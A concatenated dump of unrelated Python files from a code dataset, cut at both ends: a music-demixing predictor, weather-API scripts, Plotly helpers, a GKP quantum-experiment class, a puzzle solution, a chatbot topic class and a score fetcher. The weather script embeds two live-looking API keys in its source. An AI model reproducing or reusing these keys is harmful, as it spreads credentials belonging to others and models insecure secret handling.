evaluator.music_demixing import MusicDemixingPredictor\nfrom demucs.model import Demucs\nfrom demucs.utils import apply_model\nfrom models import get_models, Mixer\nimport torchaudio\nfrom openunmix import data, predict\nimport onnxruntime as ort\nfrom time import time, sleep\n\ndevice = torch.device('cpu')\n\nclass Predictor(MusicDemixingPredictor):\n\n def prediction_setup(self):\n self.models = get_models(model_name, load=False, device=device)\n self.demucs = Demucs(sources=[\"drums\", \"bass\", \"other\", \"vocals\"], channels=48 if '48' in demucs_name else 64)\n self.demucs.load_state_dict(torch.load(f'model/{demucs_name}.ckpt'))\n self.mixer = Mixer(device)\n self.mixer.eval()\n\n def prediction(self, mixture_file_path, bass_file_path, drums_file_path, other_file_path, vocals_file_path):\n file_paths = [bass_file_path, drums_file_path, other_file_path, vocals_file_path]\n sources = self.demix(mixture_file_path)\n for i in range(len(sources)):\n sf.write(file_paths[i], sources[i].T, samplerate=44100)\n\n def demix(self, mix_path):\n start_time = time()\n mix = sf.read(mix_path)[0].T\n base_out = self.demix_base(mix)\n print(time() - start_time)\n demucs_out = self.demix_demucs(mix)\n print(time() - start_time)\n\n sources = base_out * b + demucs_out * (1 - b)\n return sources\n\n def demix_base(self, mix):\n sources = []\n n_sample = mix.shape[1]\n for model in self.models:\n trim = model.n_fft // 2\n gen_size = model.chunk_size - 2 * trim\n pad = gen_size - n_sample % gen_size\n mix_p = np.concatenate((np.zeros((2, trim)), mix, np.zeros((2, pad)), np.zeros((2, trim))), 1)\n\n mix_waves = []\n i = 0\n while i < n_sample + pad:\n waves = np.array(mix_p[:, i:i + model.chunk_size])\n mix_waves.append(waves)\n i += gen_size\n mix_waves = torch.tensor(mix_waves, dtype=torch.float32)\n\n with torch.no_grad():\n _ort = ort.InferenceSession(f'{onnx_name}/{model.target_name}.onnx')\n tar_waves = model.istft(torch.tensor(\n _ort.run(None, {'input': model.stft(mix_waves).numpy()})[0]\n ))\n tar_signal = tar_waves[:, :, trim:-trim].transpose(0, 1).reshape(2, -1).numpy()[:, :-pad]\n sources.append(tar_signal)\n\n with torch.no_grad():\n mix = torch.tensor(mix, dtype=torch.float32)\n sources = torch.tensor(sources).detach()\n x = torch.cat([sources, mix.unsqueeze(0)], 0)\n sources = self.mixer(x)\n\n return np.array(sources)\n\n def demix_demucs(self, mix):\n mix = torch.tensor(mix, dtype=torch.float32)\n mean, std = mix.mean(), mix.std()\n mix = (mix - mean) / std\n\n with torch.no_grad():\n sources = apply_model(self.demucs, mix, split=True, overlap=0.5)\n\n sources = (sources * std + mean).cpu().numpy()\n sources[[0, 1]] = sources[[1, 0]]\n return sources\n\n\nmodel_name = 'tdf+val'\ndemucs_name = 'demucs'\nonnx_name = 'onnx'\n\nb = np.array([[[0.5]], [[0.5]], [[0.7]], [[0.9]]])\n\nsubmission = Predictor()\nsubmission.run()\nprint(\"Successfully completed music demixing...\")\n","sub_path":"predict_blend.py","file_name":"predict_blend.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644711720","text":"import urllib.request\nimport xmltodict\nimport json\nimport sys\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode, unquote, quote_plus\nimport urllib\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom datetime import datetime, timedelta\n\n\nurl = 'http://apis.data.go.kr/1360000/AsosDalyInfoService/getWthrDataList'\nkey = \"6vFwBIO5ZKEEPDpVKwkmfssrPdCMNtDdPSff4szG9k4lVLL9qkYIfTxhw6gEggcK9CA6dCD8GsrCDXe%2FU1zKYQ%3D%3D\"\n\n\ndef weather_api(startdt):\n\n startdt = datetime.strptime(startdt, \"%Y-%m-%d\")\n\n addtime = timedelta(days=6)\n enddt = startdt + addtime\n\n startdt = startdt.strftime('%Y-%m-%d')\n enddt = enddt.strftime('%Y-%m-%d')\n\n startdt = int(startdt.replace('-', ''))\n enddt = int(enddt.replace('-', ''))\n\n startdt = str(startdt)\n enddt = str(enddt)\n\n print('step1 finished -------')\n queryParams_page1 = '?' + urlencode({\n\n \"ServiceKey\": unquote(key),\n \"dataCd\": \"ASOS\",\n \"dateCd\": \"DAY\",\n \"numOfRows\": \"600\",\n \"pageNo\": \"1\",\n \"startDt\": startdt,\n \"endDt\": enddt,\n \"stnIds\": \"159\",\n \"dataType\": \"JSON\"\n\n })\n\n queryURL_page1 = url + queryParams_page1\n response_page1 = requests.get(queryURL_page1)\n info_page1 = json.loads(response_page1.text)\n\n a = []\n for i in range(len(info_page1['response']['body']['items']['item'])):\n\n df = pd.DataFrame(info_page1['response']\n ['body']['items']['item'][i], index=[0])\n\n a.append(df)\n\n print('step2 finished -------')\n\n weather_api_1 = pd.concat(a)\n\n weather_api_1 = weather_api_1[['tm', 'avgTa', 'avgRhm', 'avgPa', 'sumRn']]\n weather_api_1 = weather_api_1.rename({'tm': 'date', 'avgTa': 'mean_temp',\n 'avgRhm': 'mean_humidity', 'avgPa': 'mean_pressure', 'sumRn': 'rain'}, axis=1)\n weather_api_1 = weather_api_1.reset_index(drop=True)\n weather_api_1 = weather_api_1.replace(r'', np.nan, regex=True)\n weather_api_1 = weather_api_1.fillna(0)\n weather_api_1 = weather_api_1.astype({'mean_temp': 'float', 'mean_humidity': 'float',\n 'mean_pressure': 'float', 'rain': 'float'})\n print('step3 finished -------')\n\n return weather_api_1\n\n\ndef utc_to_date(utc):\n date = datetime.utcfromtimestamp(utc).strftime('%Y-%m-%d')\n\n return date\n\n\ndef future7_weather_api():\n\n url = 'https://api.openweathermap.org/data/2.5/onecall'\n key = \"9688b3e45c54541ccc6c099da90380ab\"\n\n queryParams_page1 = '?' + urlencode({\n\n \"lat\": 35.1028,\n \"lon\": 129.0403,\n \"appid\": unquote(key),\n \"exclude\": \"hourly,minutely,current,alerts\",\n \"units\": \"metric\"\n\n })\n\n queryURL_page1 = url + queryParams_page1\n response_page1 = requests.get(queryURL_page1)\n info_page1 = json.loads(response_page1.text)\n\n a = []\n for i in range(len(info_page1['daily'])):\n\n utc_num = info_page1['daily'][i]['dt']\n\n if 'rain' in list(info_page1['daily'][i].keys()):\n\n dict = {\"date\": utc_to_date(utc_num), 'mean_temp': info_page1['daily'][i]['temp']['day'],\n 'mean_humidity': info_page1['daily'][i]['humidity'],\n 'mean_pressure': info_page1['daily'][i]['pressure'],\n 'rain': info_page1['daily'][i]['rain']}\n\n else:\n\n dict = {\"date\": utc_to_date(utc_num), 'mean_temp': info_page1['daily'][i]['temp']['day'],\n 'mean_humidity': info_page1['daily'][i]['humidity'],\n 'mean_pressure': info_page1['daily'][i]['pressure'],\n 'rain': 0}\n\n predict = pd.DataFrame(dict, index=[0])\n\n a.append(predict)\n\n weather_pre = pd.concat(a).reset_index(drop=True)\n\n return weather_pre\n","sub_path":"back_end/weather2.py","file_name":"weather2.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77194471","text":"from datetime import datetime as dt\nfrom datetime import date, timedelta\nfrom datetime import datetime\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport numpy as np\nimport pandas as pd\n\npd.options.mode.chained_assignment = None\n\ndf = pd.read_csv(\"data/performance_analytics_cost_and_ga_metrics.csv\")\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\n\nnow = datetime.now()\ndatestamp = now.strftime(\"%Y%m%d\")\n\n\n# Data Table Update Function\ndef update_datatable(start_date, end_date):\n return df[(start_date <= df[\"Date\"]) & (df[\"Date\"] <= end_date)].to_dict(\"rows\")\n\n\n# Data Table Download Function\ndef update_download(start_date, end_date):\n return df[(start_date <= df[\"Date\"]) & (df[\"Date\"] <= end_date)]\n\n\n######################## FOR GRAPHS ########################\n\n\ndef update_graph(filtered_df, end_date):\n # Sessions Graphs\n sessions_scatter = go.Scatter(\n x=filtered_df[\"Travel Product\"], y=filtered_df[\"Sessions - This Year\"], text=\"Sessions - This Year\"\n )\n sessions_bar = go.Bar(\n x=filtered_df[\"Travel Product\"], y=filtered_df[\"Sessions - This Year\"], text=\"Sessions - This Year\", opacity=0.6\n )\n\n fig = tools.make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n subplot_titles=(\"Line Chart\", \"Bar Chart\"), # Be sure to have same number of titles as number of graphs\n )\n\n fig.append_trace(sessions_scatter, 1, 1) # 0\n fig.append_trace(sessions_bar, 2, 1) # 1\n\n # integer index below is the index of the trace\n # yaxis indices below need to start from the number of total graphs + 1 since they are on right-side\n # overlaing and anchor axes correspond to the graph number\n\n fig[\"layout\"][\"xaxis\"].update(title=\"Travel Product\")\n for i in fig[\"layout\"][\"annotations\"]:\n i[\"font\"] = dict(\n size=12,\n # color='#ff0000'\n )\n fig[\"layout\"].update(\n height=500,\n # width=750,\n showlegend=False,\n xaxis=dict(\n # tickmode='linear',\n # ticks='outside',\n # tick0=1,\n dtick=5,\n ticklen=8,\n tickwidth=2,\n tickcolor=\"#000\",\n showgrid=True,\n zeroline=True,\n # showline=True,\n # mirror='ticks',\n # gridcolor='#bdbdbd',\n gridwidth=2,\n ),\n )\n updated_fig = fig\n return updated_fig\n","sub_path":"components/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400094090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 11:44:39 2021\n\n@author: qulab\n\"\"\"\nimport numpy as np\nfrom fpga_lib.dsl import *\nfrom fpga_lib.parameters import *\nfrom fpga_lib.experiments import *\nfrom fpga_lib import entities\nfrom fpga_lib.constants import Timing\n\nfrom gkp_exp.CD_gate.conditional_displacement_compiler import SBS_simple_compiler, ConditionalDisplacementCompiler, ECD_control_simple_compiler\n\n\nclass GKP(Calibratable):\n \"\"\"\n Args:\n cal_dir (str): directory with CD gate amplitude calibrations\n \"\"\"\n # Params for ECDC sequences\n qubit_pulse_pad = IntParameter(4)\n s_tau_ns = IntParameter(20)\n b_tau_ns = IntParameter(150)\n cal_dir = StringParameter(r'D:\\DATA\\exp\\2021-06-28_cooldown\\CD_fixed_time_amp_cal')\n plusX_file = StringParameter(r'D:\\DATA\\exp\\2021-06-28_cooldown\\gkp_prep\\plus_X.npz')\n plusY_file = StringParameter('')\n plusZ_file = StringParameter('')\n\n # Params for echoed feedback reset\n echo_delay = IntParameter(868)\n feedback_delay = IntParameter(0)\n final_delay = IntParameter(64)\n \n # Params for Kerr-cancelling drive\n Kerr_drive_time_ns = IntParameter(200)\n Kerr_drive_ramp_ns = IntParameter(200)\n Kerr_drive_detune_MHz = FloatParameter(15)\n \n # Params misc\n loop_delay = IntParameter(4e6)\n t_stabilizer_ns = IntParameter(150)\n init_tau_ns = IntParameter(50)\n t_mixer_calc_ns = IntParameter(600)\n \n \n \n def __init__(self, qubit, readout, name='gkp'):\n super(GKP, self).__init__(name)\n self.qubit, self.readout = qubit, readout\n \n @subroutine\n def reset_feedback_with_echo(self, echo_delay, final_delay, feedback_delay=0, log=False, res_name='default'):\n \"\"\"\n Feedback reset with echo during readout.\n \n Args:\n echo_delay (int): delay in [ns] from the beginning of the readout\n to the qubit echo pulse.\n final_delay (int): delay in [ns] after the feedback to cancel \n deterministic (state-independent) cavity rotation.\n feedback_delay (int): delay in [ns] of the feedback pulse. There \n will be additional processing time contribution on top of this.\n log (bool): flag to log the measurement outcome.\n res_name (str): name of the result if measurement is logged.\n \"\"\"\n sync()\n delay(echo_delay, channel=self.qubit.chan, round=True)\n self.qubit.flip() # echo pulse\n self.readout(wait_result=True, log=log, sync_at_beginning=False, **{res_name:'se'})\n sync()\n delay(feedback_delay, round=True)\n if_then_else(self.qubit.measured_low(), 'flip', 'wait')\n \n label_next('flip')\n self.qubit.flip()\n goto('continue')\n \n label_next('wait')\n delay(self.qubit.pulse.length)\n goto('continue')\n \n label_next('continue')\n delay(final_delay, round=True)\n sync()\n\n @subroutine\n def reset_feedback_with_phase_update(self, phase_reg, phase_g_reg, phase_e_reg,\n log=False, res_name='default', detune=0.0, drag=0.0):\n \"\"\"\n Feedback reset with echo during readout.\n \n Args:\n phase_reg (Register): phase register to be updated.\n phase_g_reg, phase_e_reg (Register): phases that will be added to \n the phase_reg depending on the measured outcome.\n log (bool): flag to log the measurement outcome.\n res_name (str): name of the result if measurement is logged.\n detune, drag (float): exra detuning and drag that will be added\n to the calibrated pulse values.\n \"\"\"\n sync()\n self.readout(wait_result=True, log=log, **{res_name:'se'})\n delay(4*Timing.send_ext_fn) # TODO: might not need this set_int_fn\n if_then_else(self.qubit.measured_low(), 'wait', 'flip')\n \n label_next('flip')\n self.qubit.flip(detune=self.qubit.pulse.detune+detune, drag=self.qubit.pulse.drag+drag)\n phase_reg += phase_e_reg\n goto('continue')\n \n label_next('wait')\n self.qubit.delay(self.qubit.pulse.length)\n phase_reg += phase_g_reg\n goto('continue')\n \n label_next('continue')\n sync()\n\n\n @subroutine\n def reset_feedback_with_phase_update_and_Kerr_drive(self, phase_reg, phase_g_reg, phase_e_reg,\n log=False, res_name='default', detune=0.0, drag=0.0, \n Kerr_g_amp=0.0, Kerr_e_amp=0.0):\n \"\"\"\n Feedback reset with phase update and Kerr-cancelling drive. Surprise.\n \n Args:\n phase_reg (Register): phase register to be updated.\n phase_g_reg, phase_e_reg (Register): phases that will be added to \n the phase_reg depending on the measured outcome.\n log (bool): flag to log the measurement outcome.\n res_name (str): name of the result if measurement is logged.\n detune, drag (float): exra detuning and drag that will be added\n to the calibrated pulse values.\n Kerr_g_amp, Kerr_e_amp (float): amplitude of the Kerr drive\n \"\"\"\n sync()\n self.readout(wait_result=True, log=log, **{res_name:'se'})\n delay(4*Timing.send_ext_fn) # TODO: might neeed set_int_fn?\n if_then_else(self.qubit.measured_low(), 'meas_g', 'meas_e')\n \n label_next('meas_e')\n sync()\n self.qubit.flip(detune=self.qubit.pulse.detune+detune, drag=self.qubit.pulse.drag+drag)\n phase_reg += phase_e_reg\n sync()\n self.qubit_detuned.smoothed_constant_pulse(self.Kerr_drive_time_ns,\n amp=Kerr_e_amp, sigma_t=self.Kerr_drive_ramp_ns)\n self.update_phase(phase_reg, self.cavity, self.t_mixer_calc_ns)\n sync()\n goto('continue')\n \n label_next('meas_g')\n sync()\n self.qubit.delay(self.qubit.pulse.length)\n phase_reg += phase_g_reg\n sync()\n self.qubit_detuned.smoothed_constant_pulse(self.Kerr_drive_time_ns,\n amp=Kerr_g_amp, sigma_t=self.Kerr_drive_ramp_ns)\n self.update_phase(phase_reg, self.cavity, self.t_mixer_calc_ns)\n sync()\n goto('continue')\n \n label_next('continue')\n sync()\n \n\n def reset_autonomous_Murch(self, qubit_detuned_obj, readout_detuned_obj,\n cool_duration_ns, qubit_ramp_ns, readout_ramp_ns,\n qubit_amp, readout_amp, qubit_detune_MHz, readout_detune_MHz,\n qubit_angle, qubit_phase, final_delay):\n \"\"\"\n Setup autonomous qubit cooling based on this Murch paper:\n https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.109.183602\n \n Args:\n qubit_detuned_obj (Mode): qubit mode to use in the protocol\n readout_detuned_obj (Mode): readout mode to use in the protocol\n cool_duration_ns (int): how long in [ns] to hold the constant\n Rabi drive on the qubit after ramping it up.\n qubit_ramp_ns (int): duration in [ns] of the qubit Rabi drive\n ramp up/down.\n readout_ramp_ns (int): duration in [ns] of the detuned readout\n drive ramp up/down. This can typically be shorter than the\n qubit ramp because the pulse is far detuned.\n qubit_amp (float): amplitude of the qubit Rabi pulse.\n readout_amp (float): amplitude of the detuned readout pulse.\n readout_detune_MHz (float): detuning of the readout pulse in [MHz]. \n Ideally equal to the qubit Rabi rate.\n qubit_detune_MHz (float): detuning of the qubit pulse in [MHz]\n qubit_angle, qubit_phase (float): final qubit rotation parameters\n final_delay (int): delay in [ns] after the cooling protocol\n \n Returns:\n cooling subroutine.\n \"\"\"\n self.qubit_detuned = qubit_detuned_obj\n self.readout_detuned = readout_detuned_obj\n\n sync()\n self.readout_detuned.set_detune(readout_detune_MHz*1e6)\n self.qubit_detuned.set_detune(qubit_detune_MHz*1e6)\n sync()\n \n qubit_pump_time = cool_duration_ns\n readout_pump_time = cool_duration_ns+2*qubit_ramp_ns-2*readout_ramp_ns\n \n @subroutine\n def cooling_Murch():\n sync()\n self.readout_detuned.smoothed_constant_pulse(\n readout_pump_time, amp=readout_amp, sigma_t=readout_ramp_ns)\n self.qubit_detuned.smoothed_constant_pulse(\n qubit_pump_time, amp=qubit_amp, sigma_t=qubit_ramp_ns)\n sync()\n self.qubit.rotate(qubit_angle, qubit_phase)\n sync()\n delay(final_delay, round=True)\n\n return lambda: cooling_Murch()\n\n\n def sbs(self, eps1, eps2, beta, s_tau_ns, b_tau_ns):\n \"\"\"\n Single step of SBS protocol based on this Baptiste paper:\n https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.125.260509\n \n The pulse sequence is compile based on the independent calibration of\n the conditional displacement amplitude. \n \n Args:\n eps1, eps2 (float): 1st/2nd small CD amplitude\n beta (float): big CD amplitude\n \n s_tau_ns, b_tau_ns (int): wait time in the small/big CD gate\n \"\"\"\n CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n C = SBS_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n \n cavity_pulse, qubit_pulse = C.make_pulse(1j*eps1/2.0, 1j*eps2/2.0, beta,\n s_tau_ns, b_tau_ns)\n\n def sbs_step(s):\n \"\"\"\n Args:\n s (str): stabilization qudrature, either 'x' or 'p' \n \"\"\"\n phase = dict(x=0.0, p=np.pi/2.0)\n sync()\n self.cavity.array_pulse(*cavity_pulse, phase=phase[s])\n self.qubit.array_pulse(*qubit_pulse)\n sync()\n \n return sbs_step\n\n def load_sbs_sequence(self, s_tau, b_tau, ECD_filename, version):\n \"\"\"\n Args:\n version (str): \n - v1 is a simple version in which only ECD parameters beta & phi\n are loaded from the file.\n - v2 is a more complicated version in which qubit detunings and\n parameters of the pi-pulses are also used in addition to beta & phi.\n - v3 is like v2 but it returns an sbs_step that uses dynamix mixer.\n \"\"\"\n if version == 'v1':\n data = np.load(ECD_filename, allow_pickle=True)\n beta, phi = data['beta'], data['phi']\n tau = np.array([s_tau, b_tau, s_tau, 0])\n \n CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n C = ECD_control_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n c_pulse, q_pulse = C.make_pulse(beta, phi, tau)\n if version in ['v2', 'v3']:\n data = np.load(ECD_filename, allow_pickle=True)\n beta, phi, phi_CD, alpha_correction = data['beta'], data['phi'], data['flip'], data['alpha_correction']\n detune, drag = data['qb_detune']*np.ones([4,2]), data['qb_drag']*np.ones([4,2])\n \n tau = np.array([s_tau, b_tau, s_tau, 0])\n \n CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n C = ECD_control_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n c_pulse, q_pulse = C.make_pulse_v2(beta, phi, phi_CD, tau, detune, alpha_correction, drag)\n \n if version in ['v1', 'v2']:\n def sbs_step(s):\n \"\"\"\n Args:\n s (str): stabilizer direction, either 'x' or 'p'\n \"\"\"\n phase = dict(x=0.0, p=np.pi/2.0)\n sync()\n self.cavity.array_pulse(c_pulse.real, c_pulse.imag, phase=phase[s])\n self.qubit.array_pulse(q_pulse.real, q_pulse.imag)\n sync()\n \n if version == 'v3':\n def sbs_step():\n sync()\n self.cavity.array_pulse(c_pulse.real, c_pulse.imag, amp='dynamic')\n self.qubit.array_pulse(q_pulse.real, q_pulse.imag)\n sync() \n \n return sbs_step\n \n def export_ECDC_to_array_pulse(self, ecdc_filename, array_pulse_filename, **kwargs):\n \"\"\"\" Convert ECDC sequence to an array pulse and export it to a file.\n This is useful in case when different calibrated pulse parameters change\n and the previously optimized sequence becomes suboptimal. Saving the\n whole array pulse avoids this problem, since it no longer relies on cal.\"\"\"\n \n cond = 'qubit_pulse_pad' in kwargs.keys()\n qubit_pulse_pad = kwargs.pop('qubit_pulse_pad') if cond else self.qubit_pulse_pad\n \n cond = 'init_tau_ns' in kwargs.keys()\n init_tau_ns = kwargs.pop('init_tau_ns') if cond else self.init_tau_ns\n \n cond = 'cal_dir' in kwargs.keys()\n cal_dir = kwargs.pop('cal_dir') if cond else self.cal_dir \n \n CD_compiler_kwargs = dict(qubit_pulse_pad=qubit_pulse_pad)\n C = ECD_control_simple_compiler(CD_compiler_kwargs, cal_dir)\n data = np.load(ecdc_filename, allow_pickle=True)\n beta, phi = data['beta'], data['phi']\n tau = np.array([init_tau_ns]*len(data['beta']))\n c_pulse, q_pulse = C.make_pulse(beta, phi, tau)\n np.savez(array_pulse_filename, c_pulse=c_pulse, q_pulse=q_pulse)\n \n\n def stabilizer_phase_estimation(self, tau_ns):\n \n beta = np.sqrt(2*np.pi) # stabilizer CD amplitude\n C = ConditionalDisplacementCompiler(qubit_pulse_pad=self.qubit_pulse_pad)\n CD_params = C.CD_params_fixed_tau_from_cal(beta, tau_ns, self.cal_dir)\n cavity_pulse, qubit_pulse = C.make_pulse(*CD_params)\n \n def stabilizer_phase_estimation(s):\n phase = {'x' : 0.0, 'x+' : 0.0, 'x-' : np.pi, \n 'p' : np.pi/2.0, 'p+' : np.pi/2.0, 'p-' : -np.pi/2.0}\n sync()\n self.qubit.pi2_pulse(phase=np.pi/2.0)\n sync()\n self.cavity.array_pulse(*cavity_pulse, phase=phase[s])\n self.qubit.array_pulse(*qubit_pulse)\n sync()\n self.qubit.pi2_pulse(phase=-np.pi/2.0)\n sync()\n delay(24)\n self.readout(**{s:'se'})\n sync()\n \n return stabilizer_phase_estimation\n \n \n\n def displacement_phase_estimation(self, beta, tau_ns, res_name, \n echo_params=None, amp=1):\n \n C = ConditionalDisplacementCompiler(qubit_pulse_pad=self.qubit_pulse_pad)\n CD_params = C.CD_params_fixed_tau_from_cal(beta, tau_ns, self.cal_dir)\n cavity_pulse, qubit_pulse = C.make_pulse(*CD_params)\n \n sync()\n self.qubit.pi2_pulse(phase=np.pi/2.0)\n sync()\n self.cavity.array_pulse(*cavity_pulse, amp=amp)\n self.qubit.array_pulse(*qubit_pulse)\n sync()\n self.qubit.pi2_pulse(phase=-np.pi/2.0)\n sync()\n delay(24)\n if echo_params is not None:\n self.reset_feedback_with_echo(\n echo_params['echo_delay'], echo_params['final_delay'], \n log=True, res_name=res_name)\n else:\n self.readout(**{res_name:'se'})\n sync()\n \n\n def update_phase(self, phase_reg, mode, t_mixer_calc=400):\n c = FloatRegister()\n s = FloatRegister()\n c = af_cos(phase_reg)\n s = af_sin(phase_reg)\n DynamicMixer[0][0] <<= c\n DynamicMixer[1][0] <<= s\n DynamicMixer[0][1] <<= -s\n DynamicMixer[1][1] <<= c\n mode.delay(t_mixer_calc)\n mode.load_mixer()\n \n @subroutine\n def reset_mixer(self, mode, t_mixer_calc):\n sync()\n zero_phase_reg = FloatRegister(0)\n self.update_phase(zero_phase_reg, mode, t_mixer_calc)\n sync()\n ","sub_path":"gkp_qec/GKP.py","file_name":"GKP.py","file_ext":"py","file_size_in_byte":16249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205844757","text":"n=int(input())\n\nfor _ in range(n):\n s=input()\n for i in range(len(s)-1):\n if s[i]!=s[i+1]:\n if s[i] in s[i+1:]:\n n-=1\n break\nprint(n)\n","sub_path":"boj(baekjoon)/boj_1316.py","file_name":"boj_1316.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564377077","text":"from typing import Dict, Any, List, Optional, Union\n\n\ndef parse_topic(raw_topic: Dict[str, Any]) -> \"Topic\":\n topic_type = raw_topic[\"type\"]\n if topic_type == \"simple\":\n return Topic.from_dict(raw_topic)\n\n\nclass Topic:\n \"\"\"Topic to explain.\n\n Author: Bruno.\n \"\"\"\n\n def __eq__(self, other):\n return self._id == other._id\n\n @staticmethod\n def from_dict(raw_topic: Dict[str, Any]) -> \"Topic\":\n if raw_topic.get(\"examples\") is None:\n examples = []\n else:\n examples = raw_topic.get(\"examples\")\n if raw_topic.get(\"sub_topics\") is None:\n subtopics = []\n else:\n subtopics = [parse_topic(raw_topic) for raw_topic in raw_topic[\"sub_topics\"]]\n if raw_topic.get(\"questions\") is None:\n questions = []\n else:\n questions = raw_topic.get(\"questions\")\n return Topic(raw_topic[\"topic_id\"],\n raw_topic[\"utters\"],\n examples,\n subtopics,\n questions)\n\n # noinspection PyTypeChecker\n def __init__(\n self,\n topic_id: str,\n utters_explanations: List[str],\n examples: Optional[List[str]] = None,\n sub_topics: Optional[List[\"Topic\"]] = None,\n questions: Optional[List[str]] = None\n ):\n \"\"\"\n Constructor.\n\n Author: Bruno.\n\n Parameters\n ----------\n topic_id\n Identification for the topic.\n utters_explanations\n Possible explanations for the topic.\n examples\n Examples to give for the topic.\n sub_topics\n Sub topics of the topic.\n questions\n Questions to make to the user.\n \"\"\"\n self._id = topic_id\n self._utters_explanations = utters_explanations\n # Default detail level is the middle one.\n self._detail_level = int(len(utters_explanations) / 2)\n self.is_explained = False\n\n self._examples = [] if examples is None else examples\n self._current_example = 0\n\n self._sub_topics = [] if sub_topics is None else sub_topics\n self._current_sub_topic = 0\n\n self._questions = [] if questions is None else questions\n self._current_question = 0\n\n def get(self) -> Dict[str, \"Topic\"]:\n \"\"\"\n Get the current topic.\n\n Author: Tomas\n\n Returns\n -------\n Dictionary with the current topic's information and\n each subtopic within the main topic.\n \"\"\"\n topics = {self._id: self}\n for topic in self._sub_topics:\n topics.update(topic.get())\n return topics\n\n def set_current_example(self, example: int):\n \"\"\"\n Set the current examples' index.\n\n Author: Tomas\n\n Parameters\n ----------\n\n example\n new examples' index\n \"\"\"\n self._current_example = example\n\n def get_current_example(self) -> int:\n \"\"\"\n Get the current examples' index.\n\n Author: Tomas\n\n Returns\n -------\n The index of the current example.\n \"\"\"\n return self._current_example\n\n def get_explanation(self, mark_as_explained: bool = True) -> str:\n \"\"\"Explains the topic. Marks the topic as explained.\n\n Author: Bruno.\n\n Returns\n -------\n Utter associated to the explanation with current detail level.\n \"\"\"\n if mark_as_explained:\n self.is_explained = True\n if self._detail_level >= len(self._utters_explanations):\n self._detail_level = 0\n return self._utters_explanations[self._detail_level]\n \n\n def get_example(self) -> str:\n \"\"\"\n Get the utter associated to the next example to give.\n\n Author: Tomas\n\n Returns\n -------\n Utter associated to the next example if the topic has any example,\n otherwise it returns a default utter.\n \"\"\"\n if self._current_example < len(self._examples):\n example = self._examples[self._current_example]\n self._current_example += 1\n return example\n else:\n self._current_example = 0\n return \"utter_sin_ejemplos\"\n\n def get_question(self) -> str:\n \"\"\"\n Get the utter associated to the topic's next question.\n\n Author: Adrian\n\n Returns\n -------\n Utter associated to the next question if the topic has any,\n otherwise it returns a default utter.\n \"\"\"\n if self._current_question < len(self._questions):\n question = self._questions[self._current_question]\n self._current_question += 1\n return question\n else:\n self._current_question = 0\n return \"utter_sin_question\"\n\n def next(self) -> Union[\"Topic\", None]:\n \"\"\"Returns the next topic to explain.\n\n Author: Bruno.\n\n Returns\n -------\n Next topic to explain.\n \"\"\"\n if not self.is_explained:\n return self\n\n if self._current_sub_topic < len(self._sub_topics):\n topic = self._sub_topics[self._current_sub_topic]\n self._current_sub_topic += 1\n return topic\n\n return None\n\n def restart(self):\n \"\"\"Restarts the topic, so it can be explained again.\n\n Author: Bruno.\n \"\"\"\n self.is_explained = False\n self._current_example = 0\n self._current_sub_topic = 0\n for topic in self._sub_topics:\n topic.restart()\n\n def get_id(self) -> str:\n \"\"\"\n Get the current topic ID\n\n Author: Adrian\n\n Returns\n -------\n Topic's name.\n \"\"\"\n return self._id\n\n def set_explained(self, explained: bool):\n \"\"\"\n Set the current topic as explained or not explained.\n\n Author: Adrian\n\n Parameters\n ----------\n\n explained\n Boolean value to set if the current topic is explained or not.\n \"\"\"\n self.is_explained = explained\n\n @property\n def repeat(self) -> str:\n \"\"\"Repeats the explanation for the topic.\n\n Author: Bruno.\n\n Returns\n -------\n Utter associated to the explanation with next detail level if possible.\n Otherwise returns the utter for the maximum detail level.\n \"\"\"\n self._detail_level += 1\n\n \"\"\"Se marca como explicado aunque no esta explicado bien\"\"\"\n self.is_explained = True\n if self._detail_level >= len(self._utters_explanations):\n return self._utters_explanations[-1] # -1 = last element.\n\n return self._utters_explanations[self._detail_level]\n\n def get_amount_subtopics(self) -> int:\n \"\"\"\n Get the amount of subtopics of the current topic.\n\n Author: Tomas\n\n Returns\n -------\n Returns the amount of subtopics that the current topic has.\n \"\"\"\n return self._current_sub_topic\n","sub_path":"tour/topic/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135076150","text":"from aiohttp import ClientSession\nimport aiohttp\nimport json\nfrom apps.NBL.tools import safe_get\nimport time\nfrom common.libs.log import LogMgr\n\n\n# 设置日志\nlogger = LogMgr.get('acb_score_svr')\n\n\nclass GetScores(object):\n async def get_scores(self, game_id):\n url = 'https://www.fibalivestats.com/data/%s/data.json' % str(game_id)\n conn = aiohttp.TCPConnector(verify_ssl=False)\n async with ClientSession(connector=conn) as session:\n try:\n logger.info('请求前。。。。')\n logger.info(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))\n async with session.get(url) as response:\n logger.info('请求后。。。。')\n logger.info(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))\n if response.status == 200:\n response = await response.text()\n player_stat = json.loads(response)\n try:\n scores_info = player_stat['pbp'][0]\n 